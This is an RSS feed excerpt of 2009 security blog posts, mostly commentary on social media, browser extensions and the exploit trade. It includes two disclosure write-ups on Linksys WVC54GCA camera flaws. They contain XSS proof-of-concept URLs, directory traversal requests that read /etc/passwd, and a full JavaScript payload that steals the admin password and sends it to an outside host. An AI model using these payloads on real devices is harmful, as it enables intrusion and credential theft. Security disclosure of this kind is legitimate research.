         <content:encoded><![CDATA[<p>Confused information security folks (but not only) can find this video quite interesting.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/MpIOClX1jPE&#038;color1=0xb1b1b1&#038;color2=0xcfcfcf&#038;hl=en&#038;feature=player_embedded&#038;fs=1" type="application/x-shockwave-flash" width="425" height="344"></iframe></div> <p>What I liked the most about this video is that the authors clearly explain that social media is first of all the collective contributions of ordinary people through blogs, wikis, podcasts and other social instruments combined with the efforts of other individuals and organizations who are willing to aggregate, organize and help facilitate community feedback.</p> <p><em>By the people, for the people!</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Bill Gates Facebook Page</title>
         <link>http://www.hakiri.org/blog/bill-gates-facebook-page/</link>
         <description>Funny Sunday morning stuff: Steve Jobs and St. Peter are also there.</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=554</guid>
         <pubDate>Sun, 10 May 2009 02:11:40 -0700</pubDate>
         <content:encoded><![CDATA[<p>Funny Sunday morning stuff:</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.hakiri.org/static/blog/2009/05/bill-gates-facebook.jpg"><img src="http://www.hakiri.org/static/blog/2009/05/bill-gates-facebook.jpg" alt="Bill Gates Facebook JPG" title="Bill Gates Facebook JPG" width="520" height="1066" class="alignnone size-full wp-image-555"/></a></div> <p><em>Steve Jobs and St. Peter are also there.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Did You Know 3.0</title>
         <link>http://www.hakiri.org/blog/did-you-know-30/</link>
         <description>In my opinion, some of the facts presented in this video are questionable. There isn&amp;#8217;t an easy way to verify them. Nevertheless, the footage is quite interesting and informative. The reason why I am posting this is to stress that information has become an important part of our lives. Today we are information hungry. Tomorrow&amp;#8230; who knows? I suspect that we will get fed up with the world and escape for the simpler life. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=551</guid>
         <pubDate>Sun, 10 May 2009 01:52:33 -0700</pubDate>
         <content:encoded><![CDATA[<p>In my opinion, some of the facts presented in this video are questionable. There isn&#8217;t an easy way to verify them. Nevertheless, the footage is quite interesting and informative.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/jpEnFwiqdx8&#038;feature=player_embedded" type="application/x-shockwave-flash" width="425" height="350"></iframe></div> <blockquote>3.0 for 2008 &#8211; Newly Revised Edition Created by Karl Fisch, and modified by Scott McLeod; Globalization &amp; The Information Age. It was even adapted by Sony BMG at an executive meeting they held in Rome this year. Credits are also given to Scott McLeod, Jeff Brenman.</blockquote> <p><em>The reason why I am posting this is to stress that information has become an important part of our lives. Today we are information hungry. Tomorrow&#8230; who knows? I suspect that we will get fed up with the world and escape for the simpler life. You might want to check my <a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/information-overload/">previous article</a> on the same subject.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>The Revolution of the Internet in 1993</title>
         <link>http://www.hakiri.org/blog/the-revolution-of-the-internet-in-1993/</link>
         <description>A video from 1993 when the Internet was just making its premiere in the world.</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=548</guid>
         <pubDate>Sat, 09 May 2009 12:39:47 -0700</pubDate>
         <content:encoded><![CDATA[<p>A video from 1993 when the Internet was just making its premiere in the world.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.youtube.com/v/fxfhInhkvtM&#038;hl=en&#038;fs=1" type="application/x-shockwave-flash" width="425" height="344"></iframe></div>]]></content:encoded>
      </item>
      <item>
         <title>Extensions at War</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/V3taPIIsstw/</link>
         <description>Two of the most popular Firefox extensions are at war, fighting for their own piece of land. More examples will follow. Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3171</guid>
         <pubDate>Sun, 03 May 2009 01:37:28 -0700</pubDate>
         <content:encoded><![CDATA[<p>Two of the most popular Firefox extensions are at war, fighting for their own piece of land. More examples will follow.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/32912172@N00/3119211301/"><img src="http://farm4.static.flickr.com/3213/3119211301_40cbd3815d.jpg?v=0" alt="War poster,1943"/></a></div> <p>Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The <a rel="nofollow" target="_blank" href="http://adblockplus.org/blog/attention-noscript-users">story goes</a> that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don&#8217;t know why.</p> <p>The conflict seems to be resolved now to one degree or another but it is interesting to observe the whole situation and also draw important conclusions. Therefore, I&#8217;ve got several points I would like to bring to the table:</p> <ol>
<li>More examples of similar nature will follow. Keep an eye on Facebook, Apple AppStore, Firefox and other platforms that allow 3rd-party components to be displayed, downloaded and executed.</li>
<li><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/firefox-malware/">As I mentioned before</a>, a malicious piece of JavaScript code (even an obvious obfuscation) can be quite easily smuggled into harmless-looking Firefox extensions. If I may speculate, the situation is the same for other similar platforms.</li>
<li>Unless platform vendors do something about it, they could become the next hot spot for all sorts of interesting malware.</li>
</ol> <p><em>It is also very interesting to see the extent to which extension developers will go in order to protect their userbase. After all, a larger userbase equals more money. And with <a rel="nofollow" target="_blank" href="http://blog.trailofbits.com/2009/03/22/no-more-free-bugs/">more people looking to quickly cash in</a>, the battlefield is truly changing for better or worse.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Blogs, Groups and Forums</title>
         <link>http://houseofhackers.org/2009/05/02/blogs-groups-and-forums/</link>
         <description>Unlike the old platform, the new platform will provide much more purpose. It is yet to be decided how all of the features will work but it is very likely that we will drop the support for forums and emphasize the groups feature and more specifically the group wire where members of individual groups can [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=5</guid>
         <pubDate>Sat, 02 May 2009 04:10:15 -0700</pubDate>
         <content:encoded><![CDATA[<p>Unlike the old platform, the new platform will provide much more purpose. It is yet to be decided how all of the features will work but it is very likely that we will drop the support for forums and emphasize the groups feature and more specifically the group wire where members of individual groups can communicate. Additionally, we are going to allow creation of more purposeful blogs where one or several members can communicate their ideas and get community and external feedback. All of this is yet to be decided so please join us at the <a rel="nofollow">hoh</a> discussion group.</p>]]></content:encoded>
      </item>
      <item>
         <title>Welcome to HoH v2</title>
         <link>http://houseofhackers.org/2009/05/01/welcome-to-hoh-v2/</link>
         <description>Hello House of Hackers V2. I like you!</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=3</guid>
         <pubDate>Fri, 01 May 2009 10:30:42 -0700</pubDate>
         <content:encoded><![CDATA[<p>Hello House of Hackers V2. I like you!</p>]]></content:encoded>
      </item>
      <item>
         <title>Exploit Sweatshop</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/rELeF2i51BY/</link>
         <description>When I was playing/introducing the partial disclosure practice a year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for a substantial amount of money. Of course, requests of that nature were kindly ignored. I couldn&amp;#8217;t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3141</guid>
         <pubDate>Thu, 30 Apr 2009 05:04:47 -0700</pubDate>
         <content:encoded><![CDATA[<p>When I was playing/introducing the partial disclosure practice a year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for a substantial amount of money.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/28876688@N03/2696481749/"><img src="http://farm4.static.flickr.com/3288/2696481749_6b88654114.jpg?v=0" alt="Sweatshop project"/></a></div> <p>Of course, requests of that nature were kindly ignored. I couldn&#8217;t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce.</p> <p>Later on, during the CONFidence 2008 event in Krakow, I met a bunch of people who claimed that they already sell exploits to various UK companies and the figures that they were making were outstanding. To give you a clue, given the pound-dollar difference at that time, you could have made 6 times more than what ZDI and other similar programs can offer you for a top range exploit. This is already better than a top salary in the UK.</p> <p>Same year, different event&#8230; I saw an interesting presentation by Robert McArdle from Trend Micro. The presentation was titled <q>Fighting web Based, Profit-Driven Threats</q>. On one of his slides, Robert commented that <q>cybercrime is becoming more profitable than the drug cartels</q>. Perhaps you won&#8217;t be able to make as much money from carding as you might expect, but you can do quite well selling visualized stuff, such as exploits and exploit toolkits.</p> <p>Present times, DojoSec Monthly Briefings&#8230; Matthew Watchinski from Sourcefire VRT <a rel="nofollow" target="_blank" href="http://vimeo.com/4110571">talked</a> about a PDF 0day spreading around Xmas time. The exploit took Adobe a good couple of months to fix. The author sold it for 75K to an unknown 3rd party in China, according to Matthew.
The vulnerability was also relatively easy to find and required very little experience to exploit.</p> <p>All of this leads to the very obvious conclusion that, at present, cybercrime is a flourishing industry. Soon, there will be even more recruits coming to join the dark-side forces of the cybercrime cartels. They will do it for the money!</p> <div class="message"><q>No more free bugs</q> you say. I say that <strong>you</strong> are leading people to become the next generation of cyber menace. Perhaps you forgot that the information security community was built on and thrived because of a simple but fundamental principle: <q>knowledge must be free</q>.</div> <h3>Sell The Bugs</h3> <p>Regardless of how good these figures may sound to you, you need to take a step back and think carefully about what you are getting into. Here are a few points that you need to consider before selling exploits:</p> <ul>
<li><strong>Cybercrime is not a joke</strong> &#8211; If you get caught selling exploits to a dodgy 3rd party you may end up with a prison sentence longer than the sentence of a child molester. If you live in the US or UK you could be charged and treated as a terrorist, which will completely destroy not only your life but the lives of your closest people.</li>
<li><strong>TAX man problems</strong> &#8211; Oh Yes! Unjustifiable incomes could get you in trouble with the TAX man. The TAX man will hunt you and hurt you.</li>
<li><strong>Broken legs and other broken parts of the body</strong> &#8211; You have no idea whom you are selling to. Tomorrow you may wake up with broken legs and twice as poor as the day before.</li>
<li><strong>Even worse</strong> &#8211; People will kill for a lot less than 75K. Keep that in mind.</li>
</ul> <p>In my humble opinion, exploit brokerage is a risky business. There is an unquantifiable risk associated with this practice and that is only due to the high price of exploits which are sold today.</p> <h3>Exploit Sweatshop</h3> <p>Nevertheless, it is just silly to believe that no one is producing and selling exploits on a large scale. Do you remember the numerous gaming sweatshops which sprang up like wild mushrooms after the recent heavy rains in 3rd-world countries? I recall seeing a documentary on a typical day in a Chinese WoW sweatshop. I remember I saw a room full of almost naked people, numerous PCs hooked up into a gigantic DIY network spreading across the entire floor. Most of the WoW accounts were fully automated, running from virtualized platforms.</p> <p>The aim was simple: <strong>a)</strong> develop many characters in a semi-automated fashion by killing small animals and other things around the WoW world and <strong>b)</strong> sell the characters plus other artifacts to western buyers for a substantial amount of money. All of this can be achieved for as little as $70 a month per person. This is a remarkable business model which works extremely well.</p> <p>Similarly, all you need is a bunch of programmers from India, China, or Eastern Europe to code up fuzzers and run them against as many software products as possible. At the end of the day, buffer overflow exploits are relatively easy to detect. All you need is a crash caused by putting far too many 0x41 in a buffer. The crash is already an indication that something is wrong. It requires a bit of manual work to figure out whether the crash is exploitable. From personal experience, and by looking into the work of my peers, it takes approximately 10 days to develop a crash into an exploit. Most of the time, the exploitability factor of a crash is apparent and therefore no time needs to be wasted.
Other times, a crash can be archived for future investigation when it could become exploitable given it meets the necessary conditions.</p> <p>Perhaps you can do all that by paying someone as little as $70 a month, as is the case with WoW sweatshops. That is 3 times less than what I am paying for just hosting. Therefore, I most certainly can afford to hire 3-4 people right now and even double their salaries, but let&#8217;s do the maths:</p> <pre><code># average exploit price: <strong>$5000</strong>
# number of people to hire: <strong>5</strong>
# average monthly salary: <strong>$100</strong>
# job specs: <strong>write fuzzers</strong>

5 * 100 = $500 # a month expenses
5000 / 500 = 10 # months worth of work</code></pre> <p>Heck, I can even put this bill on my credit card and pay as little as $50 a month. The chances that I will sell an exploit for $5K in the next 10 months are pretty high. $5K is only if I go with a legitimate company. I can probably make 6 times more by selling it to a dodgy 3rd party. The only thing I need to worry about is the risk.</p> <h3>Some Final Words</h3> <p>Finally, I know that a lot of people are into the security business because of all the romanticism and the myths surrounding the <q>hacker</q> figure. Things look different once you become the hacker and your day job and lifestyle are surrounded by hacking and breaking into systems of any sort. There is nothing romantic about it.</p> <p><em>So, don&#8217;t get into trouble for the wrong reasons. If you are young and you need advice on what to do with your career, contact us or contact anyone who has been in this industry long enough to give you good and sensible advice.
Just don&#8217;t jump onto the <q>No free bugs!</q> bandwagon.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Jeriko Group and Source Code Repository</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/TtNVvmtSyEM/</link>
         <description>With this post I would like to inform you that Jeriko has moved into its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you&amp;#8217;ve seen before. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3130</guid>
         <pubDate>Mon, 27 Apr 2009 23:50:39 -0700</pubDate>
         <content:encoded><![CDATA[<p>With this post I would like to inform you that Jeriko has moved into its own source code repository which you will be able to find <a rel="nofollow" target="_blank" href="http://code.google.com/p/jeriko/">here</a>. There is also a discussion group <a rel="nofollow" target="_blank" href="http://groups.google.com/group/Jeriko">here</a>, if you feel like using it.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/jannem/3312115991/"><img src="http://farm4.static.flickr.com/3616/3312115991_cc2a483d06.jpg?v=0" alt="Chocolate Tools"/></a></div> <p>The version inside the new code repository is very different from the version you&#8217;ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (a wrapper around bash) which does the heavy lifting and also introduces some funky programming mechanisms. For example, now you can create jeriko scripts like this:</p> <pre><code>#!/usr/bin/env jeriko
# do my jeriko commands here
foreach-input | add-targets
generate-scan-batch | run-in-parallel</code></pre> <p>This is perhaps the simplest possible script you can write, but you can see that the jeriko shell could turn into quite a powerful feature. The shell is also a good starting point for many penetration testing jobs as it does some environment checking and preconfigures some defaults for you. The other good news is that you don&#8217;t have to learn a new programming language. Your bash skills are good for jeriko too.</p> <p><em>Just keep in mind that jeriko is merely an experiment. However, I realize that it has already become quite useful for some people. So, if you enjoy playing with bash scripts, and you feel adventurous, please join us and make this project happen.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 4)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/MLCS3DSstF8/</link>
         <description>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3070</guid>
         <pubDate>Fri, 24 Apr 2009 20:28:38 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">Hacking Linksys IP Cameras (pt 2)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/">Hacking Linksys IP Cameras (pt 3)</a></q>.</em></p> <p>There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS.</p> <h3>Disclosure of Credentials in Client-side Source Code</h3> <p>As a consumer of embedded products, I find it highly frustrating to see how many devices&#8217; web interfaces return passwords back to the browser within HTML source code.
I&#8217;ve also seen similar problems in some corporate appliances, but it is not such a common problem within the enterprise realm.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/stephenjjohnson/2899060572/"><img src="http://farm4.static.flickr.com/3134/2899060572_2f927ef7a0.jpg?v=0" title="CCTV, London 2008"/></a></div> <p>Visiting the &#8220;change admin password&#8221; page:</p> <pre><code>/adm/file.cgi?next_file=pass_wd.htm</code></pre> <p>Causes the current admin password to be returned (just view the source code with your browser):</p> <pre><code>&lt;input type="password" size="8" maxlength="64" name="admpw" value="<strong>C4mP4ssw0rd</strong>" onKeyDown="chkPsize(this.value.length,64,msg_bigpw)"&gt;</code></pre> <p>Visiting the "Wireless Security Page":</p> <pre><code>/adm/file.cgi?next_file=Wsecurity.htm</code></pre> <p>Causes the Wi-Fi WEP/WPA/WPA2 encryption key to be returned to the browser:</p> <pre><code>&lt;input type="text" name="psk" size="24" maxlength="63" value="<strong>mywirelesskey</strong>"&gt;</code></pre> <p>Obviously this is bad news, as it means that every time the aforementioned pages are visited, credentials travel in the clear (the WVC54GCA IP camera doesn't have SSL/TLS support).</p> <p>Now, I know there are people out there who might find these types of issues <em>not</em> worth fixing.
The following is the thinking behind their reasoning.</p> <p>In the case of the admin password disclosure, some people would argue that this issue wouldn't make a difference security-wise, since the camera uses <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Basic_access_authentication">basic authentication</a> which transmits credentials in the clear (base64 encoding) anyway.</p> <p>In the case of the wireless encryption key disclosure, some individuals point out that if you can sniff the Wi-Fi encryption key, it means that either 1) you're already part of the wireless network which means you must already know the key, or 2) you are part of the network via an ethernet connection which means that you don't need the wireless key at all.</p> <p>So why fix these issues then? Well, think of client-side attacks for instance. If you keep reading I'll show you how you can (for instance) use XSS to steal the admin password from the aforementioned page. If the admin password wasn't returned by the web interface, this attack would not be possible, despite basic authentication being used by the camera.</p> <h3>Several XSS bugs</h3> <p>Yes, XSS is the roach of the Internet, it's everywhere and we can't seem to be able to get rid of it! Of course, Linksys IP cameras are no exception. Finding XSS vulns requires virtually no skills (unless you are trying to bypass a strict filter logic). Also, hunting for XSS vulns can be kind of boring. As pdp usually says, "it's not finding XSS bugs which is interesting, but what you can do with it". I couldn't agree more.</p> <p>Boring PoCs:</p>
<pre><code>/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E</code></pre>
<pre><code>/img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E</code></pre>
<pre><code>/adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E</code></pre>
<pre><code>/adm/file.cgi?todo=xss&#038;this_file=%3cscript%3ealert(1)%3c/script%3e</code></pre> <p>XSS bug #1 works regardless of the authentication state of the victim user. The rest do require the victim user to be logged in for the injected JS to run within the context of the camera's domain sandbox.</p> <p>As you can see in the first two XSS vulns, we use <code>img</code> tags, rather than <code>script</code> tags, due to closing <code>script</code> tags being filtered. Once again, the developers have chosen to perform filtering against some parameters, albeit poor filtering.</p> <h4>Admin Password theft XSS PoC</h4> <p>The following is the PoC exploit which steals the admin user's password.</p> <pre><code>// <strong>evil.js</strong> : malicious JS file, typically located on attacker's site
// payload description: steals Linksys WVC54GCA admin password via XSS
// tested on FF3 and IE7
// based on code from developer.apple.com
function loadXMLDoc(url) {
    req = false;
    // branch for native XMLHttpRequest object
    if(window.XMLHttpRequest &amp;&amp; !(window.ActiveXObject)) {
        try {
            req = new XMLHttpRequest();
        } catch(e) {
            req = false;
        }
    }
    // branch for IE/Windows ActiveX version
    else if(window.ActiveXObject) {
        try {
            req = new ActiveXObject("Msxml2.XMLHTTP");
        } catch(e) {
            try {
                req = new ActiveXObject("Microsoft.XMLHTTP");
            } catch(e) {
                req = false;
            }
        }
    }
    if(req) {
        req.onreadystatechange = processReqChange;
        req.open("GET", url, true);
        req.send("");
    }
}
// end of loadXMLDoc(url)

function processReqChange() {
    // only if req shows "loaded"
    if (req.readyState == 4) {
        // only if "OK"
        if (req.status == 200) {
            // dirty credentials-scraping code
            var bits=req.responseText.split(/&#92;"/);
            var gems="";
            for (i=0;i&lt;bits.length;++i) {
                if(bits[i]=="adm" &amp;&amp; bits[i+1]==" value=") {
                    gems+="login=";
                    gems+=bits[i+2];
                }
                if(bits[i]=="admpw" &amp;&amp; bits[i+1]==" value=") {
                    gems+=&apos;&amp;password=&apos;;
                    gems+=bits[i+2];
                }
            }
            alert(gems); // this line is for demo purposes only and would be removed in a real attack
            c=new Image();
            c.src=&apos;http://google.com/x.php?&apos;+gems; // URL should point to data-theft script on attacker&apos;s site
        }
    }
}

var url="/adm/file.cgi?next_file=pass_wd.htm";
loadXMLDoc(url);</code></pre> <pre><code>http://192.168.1.115/adm/file.cgi?next_file=%3cscript%20src=http://evil.foo/<strong>evil.js</strong>%3e%3c/script%3e</code></pre> <p>If you capture the traffic while testing the exploit against yourself you will see the admin login and password being sent to google.com:</p> <div class="screen"><img src="http://www.gnucitizen.org/static/blog/2009/04/screenshot-eth1-capturing-wireshark1.png" alt="Screenshot eth1 Capturing Wireshark 1" title="Screenshot eth1 Capturing Wireshark 1" width="505" height="189" class="alignnone size-full wp-image-3100"/></div> <h4>Attack Requirements</h4> <p>In order for this exploit to work, the camera admin user must be logged in when the attack occurs. This means that a bit of social engineering is required. For instance, the attacker could set up a forum to "help" users of the WVC54GCA camera by providing tips, FAQs, etc. If the attacker is serious he could use <a rel="nofollow" target="_blank" href="http://www.timesonline.co.uk/tol/driving/article754974.ece">black hat SEO</a> and ad campaigns such as Google AdWords to attract Linksys camera users to visit the site containing the malicious XSS URLs. You get the idea!</p> <h3>Testing Info</h3> <p>All Disclosure of Credentials and XSS vulnerabilities successfully tested on:</p>
<ul>
<li>WVC54GCA</li>
<li>Firmware V1.00R22 and V1.00R24 (latest available as of 23rd April 2009)</li>
</ul>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 3)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/naGW6csyQ94/</link>
         <description>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2). Unlike the previous two vulnerabilities I released, the vulnerabilities I&amp;#8217;m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3019</guid>
         <pubDate>Wed, 22 Apr 2009 17:52:28 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">Hacking Linksys IP Cameras (pt 2)</a></q>.</em></p> <p>Unlike the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">previous</a> <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">two</a> vulnerabilities I released, the vulnerabilities I&#8217;m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. Nevertheless, these vulnerabilities might be useful for users who want to hack their Linksys IP cameras for modding purposes, rather than being used by an attacker aiming to crack into someone else&#8217;s camera.</p> <h3>Two directory traversal vulnerabilities</h3> <p>Today, instead of releasing just one vulnerability I&#8217;ll be releasing two! These two vulnerabilities have helped me understand more about the WVC54GCA wireless camera internals and I&#8217;m hoping they will also work on other Linksys camera models. Please let me know if you successfully test them on other models too!</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/spunkinator/1301627671/"><img src="http://farm2.static.flickr.com/1043/1301627671_de230961cd.jpg?v=1190074318" title="CCTV In Operation"/></a></div> <p>Both vulnerabilities are of type <strong>directory traversal</strong>, aka <strong>arbitrary file retrieval</strong>, and they both affect the same CGI program: <code>/adm/file.cgi</code>.
<em>Please note that these vulnerabilities are different to <a rel="nofollow" target="_blank" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2507">CVE-2004-2507</a>/<a rel="nofollow" target="_blank" href="http://www.securityfocus.com/bid/10476/exploit">BID 10476</a> which affected <code>/main.cgi</code> instead.</em></p> <h4>1st directory traversal hole</h4> <p>It seems that the <code>next_file</code> parameter is not filtered enough when submitted to <code>/adm/file.cgi</code>, so that either of the following requests will return the content of any file whose location is known (<code>/etc/passwd</code> in this case):</p> <pre><code>/adm/file.cgi?next_file=%2fetc%2fpasswd</code></pre>
<pre><code>/adm/file.cgi?next_file=%2fetc/passwd</code></pre>
<pre><code>/adm/file.cgi?next_file=%2e.%2f%2e.%2f%2e.%2f%2e.%2fetc%2fpasswd</code></pre> <h4>2nd directory traversal hole</h4> <p>In the case of the second directory traversal hole, the vulnerable parameter (<code>this_file</code>) is not filtered at all. So hex-encoding special symbols is <em>not</em> required:</p> <pre><code>/adm/file.cgi?todo=pwnage&#038;this_file=/etc/passwd</code></pre> <p>The following is the content of the Linux <code>passwd</code> file containing the encrypted root password. Remember that the WVC54GCA comes with BusyBox Linux by default which you can confirm by opening <code>bin/busybox</code> with any of the vulnerabilities previously discussed. I&#8217;m curious to know if the <code>passwd</code> file contains the same password on all cameras of the same model, or even if Linksys is also using the same password on other models:</p> <pre><code>root:9szj4G6pgOGeA:0:0:root:/root:/bin/sh</code></pre> <p>Notice that when exploiting the first vulnerability, we need to convert forward slashes to <code>%2f</code>, which is their hex-encoded equivalent. This is because the developer (poorly) attempted to filter directory traversal sequences when data is submitted via the <code>next_file</code> parameter. In the third example, we also partially hex-encode <code>../</code> sequences in order to avoid being blocked by the script, which results in a forbidden error.</p> <p>Needless to say, if the root password is not too strong you should be able to crack it using <a rel="nofollow" target="_blank" href="http://www.openwall.com/john/">john</a> or your favorite password cracking tool. I loaded passwd with john for a few hours on an old laptop and nothing was found, so I&#8217;m guessing the root password is not extremely weak.
If your model comes with the telnet daemon running by default, cracking that password should give you root shell access.</p> <p>Unfortunately, as I mentioned in the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">first post</a> of this series, the WVC54GCA camera comes with a telnet daemon included, but it&#8217;s off by default. I haven&#8217;t managed to enable the telnet daemon and get a remote root shell yet although I suspect it might be possible by <a rel="nofollow" target="_blank" href="http://brooknet.no-ip.com/~lex/public/WVC54G/">modifying</a> the bin firmware image and uploading it again.</p> <h4>What can we do with these vulnerabilities?</h4> <p>Well, I tried finding files that contain interesting information that helps you understand the camera better. The following are some examples:</p> <ul>
<li><code>/etc/passwd</code> : traditional-DES-format password file with no salt</li>
<li><code>/usr/local/www/img/.htpasswd</code> : HTTP credentials stored in cleartext</li>
<li><code>/usr/local/www/adm/.htpasswd</code> : contains same data as previous file</li>
<li><code>/etc/system.conf</code> : all camera settings stored in cleartext including admin password, wifi encryption key, etc &#8230;</li>
<li><code>/usr/local/bin/thttpd.conf</code> : web server config file confirming the daemon runs as root, which is the only system account present anyway</li>
<li><code>/etc/init.d/rcS</code> : here we see the line that starts the telnet daemon (<code>/usr/sbin/telnetd</code>) commented out</li>
<li><code>/etc/def_sys.conf</code> : camera&#8217;s default settings</li>
<li><code>/etc/system.conf</code> : camera&#8217;s current settings</li>
<li><code>/var/nc.log</code> : network connections logs</li>
<li><code>/etc/group</code></li>
<li><code>/etc/inittab</code></li>
<li><code>/proc/cpuinfo</code> : processor details</li>
<li><code>/proc/meminfo</code></li>
<li><code>/proc/version</code> : OS details</li>
<li><code>/proc/uptime</code></li>
</ul> <p>Finding a file upload vulnerability should allow us to overwrite the <code>/etc/init.d/rcS</code> file and eventually manage to start the telnet server after reboot. By overwriting the <code>/etc/passwd</code> file with our own we should be able to add our own root password. Unfortunately, I haven&#8217;t discovered any vulnerability that would allow me to upload files to arbitrary locations. If you do discover one, please let me know. I&#8217;d love to hear the details.</p> <h3>Testing Info</h3> <p>Directory traversal vuln #1 successfully tested on:</p>
<ul>
<li>WVC54GCA</li>
<li>Firmware V1.00R22 and V1.00R24 (latest available as of 23rd April 2009)</li>
</ul> <p>Directory traversal vuln #2 successfully tested on:</p>
<p><ul>
<li>WVC54GCA</li>
<li>V1.00R24 (latest available as on 23rd April 2009)</li>
</ul>
<p>Although I never tested the second traversal vulnerability on Firmware V1.00R22, I definitely suspect it will work on this previous firmware version as well.</p>
<p><em>Please note that the aforementioned vulnerabilities are different to <a rel="nofollow" target="_blank" href="http://www.securityfocus.com/bid/10476/exploit">BID 10476</a> which affected the <code>/main.cgi</code> program rather than <code>/adm/file.cgi</code>.</em></p>]]></content:encoded>
      </item>
      <item>
         <title>Google Me</title>
         <link>http://blog.blogsecurify.com/2009/04/google-me.html</link>
         <description>Google &lt;a rel="nofollow" target="_blank" href="http://googleblog.blogspot.com/2009/04/search-for-me-on-google.html"&gt;revealed&lt;/a&gt; that the company will serve Personal Profiles via the search results. Probably not a big deal, but this is yet another example of how far Web2.0 technologies will go. It will be interesting to see how everything will pan out. The good thing is that your profile is not available to the public by default. You need to opt in.&lt;br /&gt;&lt;br /&gt;I will most definitely be watching...</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-5916562189915269081</guid>
         <pubDate>Wed, 22 Apr 2009 06:48:00 -0700</pubDate>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 2)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/PJt6KPz8WQ0/</link>
